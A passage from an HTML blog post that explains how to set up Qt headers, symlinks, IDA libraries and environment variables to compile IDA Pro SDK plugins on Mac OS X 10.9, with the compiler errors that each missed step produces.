<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">…</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">util/qdeclarativefontloader.cpp:87:52: error: addition of default argument on redeclaration makes this constructor a default</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> constructor</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QDeclarativeFontObject::QDeclarativeFontObject(int _id = -1)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(Please note that compiling “stock” Qt requires LLVM - and not GNU GCC - to be the default </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gcc</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> alias).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There is no hope of getting an official fix, as this OS version is unsupported:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">…</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">../../include/QtCore/../../src/corelib/global/qglobal.h:331:6: warning: "This version of Mac OS X is unsupported" [-W#warnings]</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"># warning "This version of Mac OS X is unsupported"</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Therefore the best way to go is to install </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qt4-mac</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from MacPorts (do </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">not</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> use </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qt4-mac-devel</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, which is older and seemingly unmaintained). Note: at this point, you can grab a second coffee, as compiling Qt could also take </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hours</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">At the time of writing </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qt4-mac</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is a port of Qt version 4.8.5 - close enough to do the job.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Installing </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qt4-mac</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is enough to get all the required headers, but will not produce Qt libraries that could replace those bundled with IDA, as those libraries were generated specifying a different namespace at compile time.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It should be possible to edit the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Portfile</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and add the extra required option (</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-qtnamespace QT</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">), but that would probably break all other Qt-dependent binaries in MacPorts - so I did not bother to explore that option.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">At this point we end up in the error-prone-but-yet-working situation of having MacPorts Qt 4.8.5 (patched) headers in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/opt/local</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and IDA prebuilt Qt 4.8.4 libraries in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/IDA Pro/idaq.app/Contents/Frameworks</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ ls </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QtCore.framework</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QtGui.framework</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QtHelp.framework</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QtNetwork.framework</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QtSql.framework</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QtXml.framework</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">libQtCLucene.4.dylib</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA SDK “makefiles” have hardcoded references to the following include paths:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I../../include/</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I"/Users/Shared/Qt/4.8.4/include/QtCore"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I"/Users/Shared/Qt/4.8.4/include/QtGui"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I"/Users/Shared/Qt/4.8.4/include/QtXml"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I"/Users/Shared/Qt/4.8.4/include"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You can choose to edit the makefiles. I chose the other way around: creating a lot of symlinks.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ mkdir /Users/Shared/Qt/</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ mkdir /Users/Shared/Qt/4.8.4/</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ ln -s /opt/local/include/ /Users/Shared/Qt/4.8.4/include</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Failure to symlink the include directory will result in the following error message at compile-time:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qwindow.cpp:10:19: fatal error: QWidget: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">compilation terminated.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ ln -s /opt/local/bin/ /Users/Shared/Qt/4.8.4/bin</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Failure to symlink the bin directory will result in the following error message at compile-time:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/bin/sh: /Users/Shared/Qt/4.8.4/bin/moc: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make[2]: *** [obj/x86_mac_gcc_32/moc_myactions.o32] Error 127</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make[1]: *** [qwindow] Error 1</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make: *** [plugins] Error 1</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ ln -s /Applications/IDA\ Pro/idaq.app/Contents/Frameworks/ /Users/Shared/Qt/4.8.4/lib</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Failure to symlink the lib directory will result in the following error message at compile-time:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g++: error: /Users/Shared/Qt/4.8.4/lib/QtXml.framework/QtXml: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g++: error: /Users/Shared/Qt/4.8.4/lib/QtGui.framework/QtGui: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g++: error: /Users/Shared/Qt/4.8.4/lib/QtCore.framework/QtCore: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make[2]: *** [../../bin/plugins/qwindow.pmc] Error 1</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make[1]: *** [qwindow] Error 1</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make: *** [plugins] Error 1</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Grabbing IDA libraries</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1. Unzip IDA SDK archive. For the rest of this post, I will assume it has been unzipped into its default location: </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">~/idasdk65</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(Documentation sometimes refers to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">idasrc</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instead, but unfortunately we do not have a copy of this one :)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2. IDA author usually recommends putting a full copy of IDA under </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">~/idasdk65/bin</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">However, it is enough to copy or symlink the following library from IDA installation directory:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/IDA Pro/idaq.app/Contents/MacOS/libida.dylib</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Failure to do so will result in the following error message at compile-time:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ld: library not found for -lida</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">collect2: error: ld returned 1 exit status</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you would like to compile 64-bit plugins, also grab the following library:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/IDA Pro/idaq.app/Contents/MacOS/libida64.dylib</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compiling</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1. As stated in the documentation, export the following environment variables:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ export __MAC__=1</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ export MACSDK=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Remember that path? You got it from:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ xcrun --sdk macosx --show-sdk-path</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
